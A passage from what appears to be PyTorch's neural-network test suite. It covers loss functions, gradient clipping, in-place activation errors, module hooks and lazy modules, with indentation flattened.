self.assertEqual(output_with_prob, output_with_index,
rtol=1e-07, atol=1e-05)
def test_cross_entropy_label_smoothing_with_probs(self, device):
N, C = 10, 4
ks = range(5)
reductions = ['none', 'mean', 'sum']
label_smoothings = [0.05, 0.15]
# Test with k-dimensional loss.
for k, label_smoothing in product(ks, label_smoothings):
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = F.log_softmax(torch.randn(N, C, *other_dims, device=device), dim=1)
for reduction in reductions:
# use with label_smoothing
loss = nn.CrossEntropyLoss(reduction=reduction, label_smoothing=label_smoothing)
output_with_smoothing = loss(input, target)
# manually smoothing target
# class_proba^ls = class_proba * (1 - label_smoothing) +
# label_smoothing / n_classes
target_with_smoothing = target * (1 - label_smoothing) + label_smoothing / C
loss = nn.CrossEntropyLoss(reduction=reduction)
output_with_manual_smoothing = loss(input, target_with_smoothing)
self.assertEqual(output_with_smoothing, output_with_manual_smoothing)
def test_softshrink_negative(self, device):
input = torch.randn(5, device=device, requires_grad=True)
m = torch.nn.Softshrink(-1)
with self.assertRaisesRegex(RuntimeError,
r'lambda must be greater or equal to 0, but found to be -1\.'):
m(input)
def test_fold(self, device):
def test_dtype(fn, input, dtype):
input = input.detach().clone().to(dtype=dtype).requires_grad_(True)
input2 = input.detach().clone().float().requires_grad_(True)
out = fn(input)
out.sum().backward()
out2 = fn(input2)
out2.sum().backward()
self.assertEqual(out.dtype, dtype)
self.assertEqual(input.grad.dtype, dtype)
self.assertEqual(out, out2.to(dtype=dtype), atol=0.05, rtol=0)
self.assertEqual(input.grad, input2.grad.to(dtype=dtype))
def func(x):
return F.fold(x, output_size=(4, 5), kernel_size=(2, 2))
seeds = (44, 83, 71, 25, 999)
for sd in seeds:
torch.manual_seed(sd)
x = torch.randn(1, 12, 12, device=device, requires_grad=True)
gradcheck(func, [x])
gradgradcheck(func, [x])
if device == 'cpu':
test_dtype(func, x, torch.bfloat16)
def test_logsigmoid_out(self, device):
# this isn't actually documented, but was broken previously:
# https://github.com/pytorch/pytorch/issues/36499
x = torch.randn(2, 3, device=device).t()
empty_out = torch.randn(0, device=device)
self.assertEqual(F.logsigmoid(x), F.logsigmoid(x, out=empty_out))
noncontig_out = torch.randn(2, 3, device=device).t()
self.assertEqual(F.logsigmoid(x), F.logsigmoid(x, out=noncontig_out))
def test_maxpool3d_non_square_backward(self, device):
# previous CUDA routine of this backward calculates kernel launch grid size
# with last two dimensions interchanged, so the tailing along the longer dim
# get ignored. Here we test whether every position gets gradient.
for dim in (2, 3, 4):
shape = tuple(32 if i != dim else 256 for i in range(4))
x = torch.randn(shape, device=device, requires_grad=True)
F.max_pool3d(x, kernel_size=(1, 1, 1)).sum().backward()
self.assertEqual(x.grad, torch.ones_like(x.grad))
# Check that clip_grad_norm_ raises an error if the total norm of the
# parameters' gradients is non-finite
def test_clip_grad_norm_error_if_nonfinite(self, device):
norms_pos = [0.1, 1, 2, 3.5, inf]
norms_neg = [-0.1, -1, -2, -3.5]
norms_except_0 = norms_pos + norms_neg
norms_all = norms_except_0 + [0]
# Each entry in test_cases has the following values, in this order:
#
# grad_only_one_elem If True, only one element of the parameter's
# gradient is set to the scalar grad, and the
# rest of the elements are 0. If False, all grad
# elements are equal to the scalar.
#
# prefix_finite_grad_param If True, prefix a parameter that has a grad
# of 1.
#
# scalars Scalars to use as the parameter's grad, through
# multiplication
#
# norms_nonfinite Norm types that should produce nonfinite total norm
#
# norms_finite Norm types that should produce finite total norm
test_cases = [
# Test errors from an infinite grad
(False, False, [inf, -inf], norms_except_0, [0]),
(False, True, [inf, -inf], norms_pos, norms_neg + [0]),
(True, False, [inf, -inf], norms_pos, norms_neg + [0]),
(True, True, [inf, -inf], norms_pos, norms_neg + [0]),
# Test errors from a NaN grad
(False, False, [nan], norms_except_0, [0]),
(False, True, [nan], norms_except_0, [0]),
(True, False, [nan], norms_except_0, [0]),
(True, True, [nan], norms_except_0, [0]),
# Test a grad that should never error
(False, False, [2e22, -2e22], [], norms_all),
(False, True, [2e22, -2e22], [], norms_all),
(True, False, [2e22, -2e22], [], norms_all),
(True, True, [2e22, -2e22], [], norms_all),
# Test a grad that will overflow to inf for only some norm orders
(False, False, [2e200, -2e200], [3.5, 2, -2, -3.5], [inf, 1, 0.1, 0, -1, -0.1]),
(False, True, [2e200, -2e200], [3.5, 2], norms_neg + [inf, 1, 0.1, 0]),
(True, False, [2e200, -2e200], [3.5, 2], norms_neg + [inf, 1, 0.1, 0]),
(True, True, [2e200, -2e200], [3.5, 2], norms_neg + [inf, 1, 0.1, 0]),
]
def gen_parameters(scalar, grad_only_one_elem, prefix_finite_grad_param):
param = torch.ones(10, dtype=torch.float64, device=device, requires_grad=True)
if grad_only_one_elem:
param[1].mul(scalar).sum().backward()
else:
param.mul(scalar).sum().backward()
if prefix_finite_grad_param:
prefix_param = torch.ones(1, dtype=torch.float64, device=device, requires_grad=True)
prefix_param.mul(1).sum().backward()
parameters = [prefix_param, param]
else:
parameters = [param]
return parameters
def run_test_case(norm_type, error_if_nonfinite, scalar, grad_only_one_elem, prefix_finite_grad_param, is_norm_nonfinite):
msg = (
f'norm_type: {norm_type}, ',
f'error_if_nonfinite: {error_if_nonfinite}, '
f'scalar: {scalar}, '
f'grad_only_one_elem: {grad_only_one_elem}, '
f'prefix_finite_grad_param: {prefix_finite_grad_param}, '
f'is_norm_nonfinite: {is_norm_nonfinite}')
parameters = gen_parameters(scalar, grad_only_one_elem, prefix_finite_grad_param)
# Should only throw an error if the total norm is expected to be
# nonfinite and `error_if_nonfinite=True`
if is_norm_nonfinite and error_if_nonfinite:
error_msg = f'The total norm of order {float(norm_type)} for gradients'
grads_before = [p.grad.clone() for p in parameters]
with self.assertRaisesRegex(RuntimeError, error_msg, msg=msg):
clip_grad_norm_(parameters, 1, norm_type=norm_type, error_if_nonfinite=True)
# Grad should not change if error is thrown
grads_after = [p.grad for p in parameters]
self.assertEqual(grads_before, grads_after, msg=msg)
else:
clip_grad_norm_(parameters, 1, norm_type=norm_type, error_if_nonfinite=error_if_nonfinite)
for grad_only_one_elem, prefix_finite_grad_param, scalars, norms_nonfinite, norms_finite in test_cases:
for error_if_nonfinite in [False, True]:
for norm_type, scalar in product(norms_nonfinite, scalars):
run_test_case(norm_type, error_if_nonfinite, scalar, grad_only_one_elem, prefix_finite_grad_param, True)
for norm_type, scalar in product(norms_finite, scalars):
run_test_case(norm_type, error_if_nonfinite, scalar, grad_only_one_elem, prefix_finite_grad_param, False)
@onlyCUDA
@deviceCountAtLeast(2)
def test_clip_grad_norm_multi_device(self, devices):
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.layer1 = nn.Linear(10, 10)
self.layer2 = nn.Linear(10, 10)
test_model = TestModel()
test_model.layer1.to(devices[0])
test_model.layer2.to(devices[1])
ref_model = TestModel().to(devices[0])
for norm_type in [2., math.inf]:
for p in test_model.parameters():
p.grad = torch.ones_like(p)
for p in ref_model.parameters():
p.grad = torch.ones_like(p)
norm = clip_grad_norm_(test_model.parameters(), 0.5, norm_type=norm_type)
expected = clip_grad_norm_(ref_model.parameters(), 0.5, norm_type=norm_type)
self.assertEqual(norm, expected)
for p, pe in zip(test_model.parameters(), ref_model.parameters()):
self.assertEqual(p.grad.to(devices[0]), pe.grad)
def test_elu_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.elu(x, inplace=True)
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.elu_(x)
@expectedFailureMeta # https://github.com/pytorch/pytorch/issues/54897
def test_hardswish_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.hardswish(x, inplace=True)
def test_silu_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.silu(x, inplace=True)
@onlyOnCPUAndCUDA
def test_mish_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.mish(x, inplace=True)
def test_softplus_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.softplus(x, out=x)
def test_softplus_low_threshold(self, device):
# Ensure gradients are computed correctly with a low threshold.
model = torch.nn.Softplus(threshold=1).double()
input = torch.tensor(0.9, device=device, dtype=torch.double,
requires_grad=True)
output = model(input)
torch.autograd.gradcheck(model, input)
def test_softshrink_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.softshrink(x, out=x)
def test_leaky_relu_inplace_overlap(self, device):
x = torch.randn((1, 6), device=device).expand((6, 6))
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.leaky_relu(x, inplace=True)
with self.assertRaisesRegex(RuntimeError, 'unsupported operation'):
F.leaky_relu_(x)
def test_threshold_inplace_overlap(self, device):
# Inplace threshold is okay, because it is idempotent
x = torch.randn((1, 6), device=device).expand((6, 6))
F.threshold(x, 0.5, 0.5, inplace=True)
F.threshold_(x, 0.5, 0.5)
@onlyOnCPUAndCUDA
def test_triplet_margin_with_distance_loss_default_parity(self, device):
# Test for `nn.TripletMarginWithDistanceLoss` and
# `F.triplet_margin_with_distance_loss`. Checks
# for parity against the respective non-distance-agnostic
# implementations of triplet margin loss (``nn.TripletMarginLoss`
# and `F.triplet_margin_loss`) under *default args*.
for extra_args in \
itertools.product((0.5, 1, 1.5), (True, False), ('none', 'mean', 'sum')):
kwargs = {'margin': extra_args[0], 'swap': extra_args[1], 'reduction': extra_args[2]}
anchor = torch.randn(5, 10, device=device, requires_grad=True)
positive = torch.randn(5, 10, device=device, requires_grad=True)
negative = torch.randn(5, 10, device=device, requires_grad=True)
# Test forward, functional
expected = F.triplet_margin_loss(anchor, positive, negative, **kwargs)
actual = F.triplet_margin_with_distance_loss(anchor, positive, negative, **kwargs)
self.assertEqual(actual, expected, rtol=1e-6, atol=1e-6)
# Test forward, module
loss_ref = nn.TripletMarginLoss(**kwargs)
loss_op = nn.TripletMarginWithDistanceLoss(**kwargs)
self.assertEqual(loss_op(anchor, positive, negative),
loss_ref(anchor, positive, negative),
rtol=1e-6, atol=1e-6)
# Test backward
self.assertTrue(gradcheck(lambda a, p, n: F.triplet_margin_with_distance_loss(
a, p, n, **kwargs), (anchor, positive, negative)))
self.assertTrue(gradcheck(lambda a, p, n: loss_op(a, p, n),
(anchor, positive, negative)))
@onlyOnCPUAndCUDA
def test_triplet_margin_with_distance_loss(self, device):
# Test for parity between `nn.TripletMarginWithDistanceLoss` and
# `F.triplet_margin_with_distance_loss`.
pairwise_distance = nn.PairwiseDistance()
def cosine_distance(x, y):
return 1.0 - F.cosine_similarity(x, y)
distance_functions = (pairwise_distance, cosine_distance,
lambda x, y: 1.0 - F.cosine_similarity(x, y))
reductions = ('mean', 'none', 'sum')
margins = (1.0, 1.5, 0.5)
swaps = (True, False)
for distance_fn, reduction, margin, swap \
in itertools.product(distance_functions, reductions, margins, swaps):
anchor = torch.randn(5, 10, device=device, requires_grad=True)
positive = torch.randn(5, 10, device=device, requires_grad=True)
negative = torch.randn(5, 10, device=device, requires_grad=True)
# Test backward
self.assertTrue(gradcheck(lambda a, p, n: F.triplet_margin_with_distance_loss(
a, p, n, distance_function=distance_fn, reduction=reduction, margin=margin, swap=swap),
(anchor, positive, negative)))
loss_op = nn.TripletMarginWithDistanceLoss(distance_function=distance_fn,
reduction=reduction, margin=margin, swap=swap)
self.assertTrue(gradcheck(lambda a, p, n: loss_op(
a, p, n), (anchor, positive, negative)))
traced_loss_op = torch.jit.trace(loss_op, (anchor, positive, negative))
self.assertTrue(gradcheck(lambda a, p, n: traced_loss_op(
a, p, n), (anchor, positive, negative)))
# Test forward parity
functional = F.triplet_margin_with_distance_loss(anchor, positive, negative,
distance_function=distance_fn,
reduction=reduction, margin=margin, swap=swap)
modular = loss_op(anchor, positive, negative)
traced = traced_loss_op(anchor, positive, negative)
self.assertEqual(functional, modular, atol=1e-6, rtol=1e-6)
self.assertEqual(traced, modular, atol=1e-6, rtol=1e-6)
def test_to_complex(self, device):
m = nn.Linear(3, 5).to(device)
self.assertIs(m, m.to(device))
m.to(torch.cfloat)
self.assertIs(m.weight.dtype, torch.cfloat)
m.to(torch.cdouble)
self.assertIs(m.weight.dtype, torch.cdouble)
m.to(torch.float)
self.assertIs(m.weight.dtype, torch.float)
with warnings.catch_warnings(record=True) as w:
# Trigger warning
m.to(torch.cfloat)
# Check warning occurs
self.assertEqual(len(w), 1)
self.assertTrue("Complex modules are a new feature" in str(w[-1].message))
@skipMeta
@dtypes(torch.float32, torch.float64)
def test_module_to_empty(self, device, dtype):
class MyModule(nn.Module):
def __init__(self, in_features, out_features, device=None, dtype=None):
super().__init__()
factory_kwargs = {"device": device, "dtype": dtype}
self.weight = nn.Parameter(torch.randn(in_features, out_features, **factory_kwargs))
def forward(self, x):
return x @ self.weight
# Test meta module instantiation.
input = torch.randn(5, 10, device=device, dtype=dtype)
m = MyModule(10, 1, device='meta', dtype=dtype)
m(input)
# Test materializing meta module on a real device.
m.to_empty(device=device)
m(input)
with torch.no_grad():
torch.nn.init.kaiming_uniform_(m.weight)
m(input)
# Test creating meta module from materialized module.
m.to_empty(device='meta')
m(input)
@skipMeta
def test_skip_init(self, device):
torch.manual_seed(1)
m_initialized = torch.nn.Linear(5, 1)
m_initialized.to(device)
torch.manual_seed(1)
m_uninitialized = torch.nn.utils.skip_init(torch.nn.Linear, 5, 1, device=device)
self.assertEqual(m_initialized.weight.device, m_uninitialized.weight.device)
self.assertFalse(torch.allclose(m_initialized.weight, m_uninitialized.weight))
class TestModuleGlobalHooks(TestCase):
def tearDown(self):
nn.modules.module._global_backward_hooks = OrderedDict()
nn.modules.module._global_forward_hooks = OrderedDict()
nn.modules.module._global_forward_pre_hooks = OrderedDict()
def test_module_global_hooks(self):
module = nn.Sigmoid
module_1 = module()
module_2 = module()
module_3 = module()
input = torch.ones(5, 5, requires_grad=True)
counter = {
'forwards': 0,
'backwards': 0
}
def fw_hook(inc, h_module, input, output):
self.assertIsInstance(input, tuple)
self.assertTrue(isinstance(output, torch.Tensor))
self.assertTrue(isinstance(h_module, module))
self.assertEqual(input[0], torch.ones(5, 5))
self.assertEqual(output, torch.empty(5, 5).fill_(1 / (1 + 1 / math.e)))
counter['forwards'] += inc
def bw_hook(inc, h_module, grad_input, grad_output):
self.assertIsInstance(grad_input, tuple)
self.assertIsInstance(grad_output, tuple)
self.assertTrue(isinstance(h_module, module))
self.assertEqual(grad_output[0], torch.ones(5, 5) * 2)
counter['backwards'] += inc
test_fwd = nn.modules.module.register_module_forward_hook(lambda *args: fw_hook(1, *args))
module_1(input)
module_2(input)
module_3(input)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 0)
test_bwd = nn.modules.module.register_module_backward_hook(
lambda *args: bw_hook(1, *args))
output_1 = module_1(input)
output_2 = module_2(input)
output_3 = module_3(input)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 0)
output_1.backward(torch.ones(5, 5) * 2, retain_graph=True)
output_2.backward(torch.ones(5, 5) * 2, retain_graph=False)
output_3.backward(torch.ones(5, 5) * 2, retain_graph=False)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 3)
output_1.backward(torch.ones(5, 5) * 2, retain_graph=True)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 4)
test2_fwd = nn.modules.module.register_module_forward_hook(lambda *args: fw_hook(2, *args))
output = module_1(input)
output = module_2(input)
output = module_3(input)
self.assertEqual(counter['forwards'], 15)
self.assertEqual(counter['backwards'], 4)
test2_bwd = nn.modules.module.register_module_backward_hook(lambda *args: bw_hook(2, *args))
module_1(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 18)
self.assertEqual(counter['backwards'], 7)
test2_bwd.remove()
module_2(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 21)
self.assertEqual(counter['backwards'], 8)
test2_fwd.remove()
module_3(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 22)
self.assertEqual(counter['backwards'], 9)
test_fwd.remove()
test_bwd.remove()
def test_module_global_hook_invalid_outputs(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
def bw_fail1(self, grad_input, grad_output):
return grad_input[:-1]
def bw_fail2(self, grad_input, grad_output):
return grad_input + (torch.randn(2, 2),)
with nn.modules.module.register_module_backward_hook(bw_fail1):
with self.assertRaisesRegex(RuntimeError, 'got 0, but expected 1'):
module(input).sum().backward()
with nn.modules.module.register_module_backward_hook(bw_fail2):
with self.assertRaisesRegex(RuntimeError, 'got 2, but expected 1'):
module(input).sum().backward()
def test_module_backward_global_hook_writeable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.sigmoid(input)
def bw_hook(module, grad_input, grad_output):
for grad in grad_input:
self.assertTrue(isinstance(grad, torch.Tensor))
for grad in grad_output:
self.assertTrue(isinstance(grad, torch.Tensor))
return tuple(gi * 2 for gi in grad_input)
nn.modules.module.register_module_backward_hook(bw_hook)
module(input).backward(torch.ones(5, 5))
expected_grad = sig_x * (1 - sig_x) * 2
self.assertEqual(input.grad, expected_grad)
def test_module_global_forward_preforward_hook_writeable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.sigmoid(input)
def forward_pre_hook(m, input):
return torch.nn.functional.relu(input[0])
def forward_hook(m, input, output):
return -output
nn.modules.module.register_module_forward_pre_hook(forward_pre_hook)
nn.modules.module.register_module_forward_hook(forward_hook)
output = module(input)
expected_res = -torch.sigmoid(torch.nn.functional.relu(input))
self.assertEqual(output, expected_res)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
mask = (input > 0).double()
expected_grad = -sig_x * (1 - sig_x) * 2 * mask
self.assertEqual(input.grad, expected_grad)
def test_module_forward_preforward_hook_removable(self):
"""
This test is to test when multiple pre-forward hook functions can be
registered successfully and used correctly, if the handle can be removable
during the pre-forward hook function call.
"""
module = nn.Sigmoid()
def removable_hook(m, input):
nonlocal handle
handle.remove()
return input
def removable_hook_2(m, input):
nonlocal handle_2
handle_2.remove()
return input
handle = module.register_forward_pre_hook(removable_hook)
handle_2 = module.register_forward_pre_hook(removable_hook_2)
# make sure hook register is successful
self.assertEqual(len(handle.hooks_dict_ref()), 2)
self.assertEqual(len(handle_2.hooks_dict_ref()), 2)
input = torch.randn(2, 2)
output = module(input)
self.assertEqual(torch.sigmoid(input), output)
# make sure hook removal is successful
self.assertFalse(handle.id in handle.hooks_dict_ref())
self.assertFalse(handle_2.id in handle.hooks_dict_ref())
self.assertEqual(len(handle.hooks_dict_ref()), 0)
self.assertEqual(len(handle_2.hooks_dict_ref()), 0)
def test_module_forward_forward_hook_removable(self):
"""
This test is to test when multiple forward hook functions can be registered
successfully and used correctly, if the handle can be removable during the
forward hook function call.
"""
module = nn.Sigmoid()
def removable_hook(m, input, output):
nonlocal handle
handle.remove()
return output
def removable_hook_2(m, input, output):
nonlocal handle_2
handle_2.remove()
return output
handle = module.register_forward_hook(removable_hook)
handle_2 = module.register_forward_hook(removable_hook_2)
# make sure hook register is successful
self.assertEqual(len(handle.hooks_dict_ref()), 2)
self.assertEqual(len(handle_2.hooks_dict_ref()), 2)
input = torch.randn(2, 2)
output = module(input)
self.assertEqual(torch.sigmoid(input), output)
# make sure hook removal is successful
self.assertFalse(handle.id in handle.hooks_dict_ref())
self.assertFalse(handle_2.id in handle.hooks_dict_ref())
self.assertEqual(len(handle.hooks_dict_ref()), 0)
self.assertEqual(len(handle_2.hooks_dict_ref()), 0)
def test_global_and_local_hooks_order(self):
module = nn.Sigmoid()
global_forward_pre_called = False
local_forward_pre_called = False
global_forward_called = False
local_forward_called = False
global_backward_called = False
local_backward_called = False
def global_forward_pre_hook(m, input):
nonlocal global_forward_pre_called
self.assertTrue(not local_forward_pre_called)
global_forward_pre_called = True
return input
def local_forward_pre_hook(m, input):
nonlocal local_forward_pre_called
self.assertTrue(global_forward_pre_called)
local_forward_pre_called = True
return input
def global_forward_hook(m, input, output):
nonlocal global_forward_called
self.assertTrue(not local_forward_called)
global_forward_called = True
return output
def local_forward_hook(m, input, output):
nonlocal local_forward_called
self.assertTrue(global_forward_called)
local_forward_called = True
return output
def global_backward_hook(m, input, output):
nonlocal global_backward_called
self.assertTrue(not local_backward_called)
global_backward_called = True
return input
def local_backward_hook(m, input, output):
nonlocal local_backward_called
self.assertTrue(global_backward_called)
local_backward_called = True
return input
input = torch.randn(5, 5, requires_grad=True)
nn.modules.module.register_module_forward_pre_hook(global_forward_pre_hook)
module.register_forward_pre_hook(local_forward_pre_hook)
nn.modules.module.register_module_forward_hook(global_forward_hook)
module.register_forward_hook(local_forward_hook)
nn.modules.module.register_module_backward_hook(global_backward_hook)
module.register_backward_hook(local_backward_hook)
output = module(input)
self.assertTrue(local_forward_called and local_forward_pre_called and global_forward_called and global_forward_pre_called)
output.backward(torch.ones(5, 5), retain_graph=True)
self.assertTrue(local_backward_called and global_backward_called)
class LazyModule(torch.nn.modules.lazy.LazyModuleMixin, torch.nn.Module):
pass
class TestLazyModules(TestCase):
@suppress_warnings
def test_lazy_module_parameter(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
state_dict = module.state_dict()
self.assertIsInstance(state_dict['test_param'], UninitializedParameter)
new_module = LazyModule()
# An error is raised when there is an attempt to replace an existing parameter
# with an uninitialized one
new_module.register_parameter('test_param', nn.Parameter(torch.ones(5, 5)))
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
new_module.load_state_dict(state_dict)
# Uninitialized parameters are overriden when the state dict to be loaded contains a valid one
new_module = LazyModule()
new_module.register_parameter('test_param', nn.Parameter(torch.ones(5, 5)))
module.load_state_dict(new_module.state_dict())
self.assertEqual(module.test_param, torch.ones((5, 5)))
# Uninitialized parameters are left unchanged
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
new_module = LazyModule()
new_module.register_parameter('test_param', UninitializedParameter())
module.load_state_dict(new_module.state_dict())
self.assertTrue(module.has_uninitialized_params())
@suppress_warnings
def test_lazy_module_buffer(self):
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
state_dict = module.state_dict()
self.assertIsInstance(state_dict['test_buffer'], UninitializedBuffer)
new_module = LazyModule()
# An error is raised when there is an attempt to replace an existing parameter
# with an uninitialized one
new_module.register_buffer('test_buffer', torch.ones(5, 5))
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
new_module.load_state_dict(state_dict)
# Uninitialized parameters are overriden when the state dict to be loaded contains a valid one
new_module = LazyModule()
new_module.register_buffer('test_buffer', torch.ones(5, 5))
module.load_state_dict(new_module.state_dict())
self.assertEqual(module.test_buffer, torch.ones((5, 5)))
# Uninitialized parameters are left unchanged
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
new_module = LazyModule()
new_module.register_buffer('test_buffer', UninitializedBuffer())
module.load_state_dict(new_module.state_dict())
module.load_state_dict(new_module.state_dict())
self.assertTrue(module.has_uninitialized_params())
@suppress_warnings
def test_lazy_module_jit_param(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'run a forward pass'):
torch.jit.script(module)
@suppress_warnings
def test_lazy_module_jit_buffer(self):
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'run a forward pass'):
torch.jit.script(module)
@suppress_warnings
def test_lazy_share_memory_param(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'share memory on an uninitialized'):
module.share_memory()
@suppress_warnings
def test_lazy_share_memory_buffer(self):
module = LazyModule()
module.register_buffer('test_buffer', UninitializedBuffer())
self.assertTrue(module.has_uninitialized_params())
with self.assertRaisesRegex(RuntimeError, 'share memory on an uninitialized'):
module.share_memory()
@suppress_warnings
def test_linear(self):
module = nn.LazyLinear(10)
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(5, 5)
module(input)
self.assertIsInstance(module, nn.Linear)
self.assertNotIsInstance(module, nn.LazyLinear)
self.assertTrue(module.weight.shape == (10, 5))
self.assertTrue(module.bias.shape == (10,))
y = module(input)
self.assertTrue(torch.equal(torch.nn.functional.linear(input, module.weight, module.bias), y))
@suppress_warnings
def test_lazy_linear_pickle(self):
module = nn.LazyLinear(10)
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(module, nn.LazyLinear)
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(5, 5)
module(input) # fully materialized
new_module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(new_module, nn.Linear)
self.assertNotIsInstance(new_module, nn.LazyLinear)
self.assertTrue(new_module.weight.shape == (10, 5))
self.assertNotIsInstance(new_module.weight, UninitializedParameter)
self.assertTrue(new_module.bias.shape == (10,))
self.assertNotIsInstance(new_module.bias, UninitializedParameter)
@suppress_warnings
def test_linear_state(self):
module = nn.Linear(5, 10)
lazy_module = nn.LazyLinear(10)
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# Linear one until the first iteration. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
self.assertTrue(lazy_module.weight.shape == (10, 5))
self.assertTrue(lazy_module.bias.shape == (10,))
module = nn.Linear(5, 10)
lazy_module = nn.LazyLinear(10)
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def _check_lazy_conv(self, cls, lazy_cls, func, init_args, input_shape,
expected_weight_shape, expected_bias_shape):
module = lazy_cls(*init_args)
self.assertIsInstance(module.weight, UninitializedParameter)
if module.bias is not None:
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(*input_shape)
module(input)
self.assertIsInstance(module, cls)
self.assertNotIsInstance(module, lazy_cls)
self.assertEqual(module.weight.shape, expected_weight_shape)
if module.bias is not None:
self.assertEqual(module.bias.shape, expected_bias_shape)
y = module(input)
self.assertTrue(torch.equal(func(input, module.weight, module.bias), y))
def _check_lazy_conv_pickle(self, cls, lazy_cls, init_args, input_shape,
expected_weight_shape, expected_bias_shape):
module = lazy_cls(*init_args)
self.assertIsInstance(module.weight, UninitializedParameter)
if module.bias is not None:
self.assertIsInstance(module.bias, UninitializedParameter)
module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(module, lazy_cls)
self.assertIsInstance(module.weight, UninitializedParameter)
if module.bias is not None:
self.assertIsInstance(module.bias, UninitializedParameter)
input = torch.ones(*input_shape)
module(input) # fully materialized
new_module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(new_module, cls)
self.assertNotIsInstance(new_module, lazy_cls)
self.assertEqual(new_module.weight.shape, expected_weight_shape)
self.assertNotIsInstance(new_module.weight, UninitializedParameter)
if new_module.bias is not None:
self.assertEqual(new_module.bias.shape, expected_bias_shape)
self.assertNotIsInstance(new_module.bias, UninitializedParameter)
def _check_lazy_conv_state(self, gen_module, gen_lazy_module,
expected_weight_shape, expected_bias_shape):
module = gen_module()
lazy_module = gen_lazy_module()
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# Conv one until the first iteration. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
self.assertEqual(lazy_module.weight.shape, expected_weight_shape)
if lazy_module.bias is not None:
self.assertEqual(lazy_module.bias.shape, expected_bias_shape)
module = gen_module()
lazy_module = gen_lazy_module()
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def test_lazy_pre_forward_hook(self):
"""
This test is to test whether lazymodule can register other pre-forward hook
functions successfully.
"""
class TestModule(torch.nn.modules.lazy.LazyModuleMixin, torch.nn.Module):
def __init__(self):
super().__init__()
def initialize_parameters(self, input):
return None
def forward(self, input):
return input
def hook_function(module, input):
return input[0] + 1
module = TestModule()
module.register_forward_pre_hook(hook_function)
output = module(torch.zeros(2, 2))
self.assertEqual(output, torch.ones(2, 2))
def test_lazy_forward_hook(self):
"""
This test is to test whether lazymodule can register other forward hook
functions successfully.
"""
class TestModule(torch.nn.modules.lazy.LazyModuleMixin, torch.nn.Module):
def __init__(self):
super().__init__()
def initialize_parameters(self, input):
return None
def forward(self, input):
return input
def hook_function(module, input, output):
return input[0] + 1
module = TestModule()
module.register_forward_hook(hook_function)
output = module(torch.zeros(2, 2))
self.assertEqual(output, torch.ones(2, 2))
@suppress_warnings
def test_lazy_conv1d(self):
self._check_lazy_conv(nn.Conv1d, nn.LazyConv1d, torch.nn.functional.conv1d,
(32, 2), (192, 16, 50), (32, 16, 2), (32,))
@suppress_warnings
def test_lazy_conv1d_pickle(self):
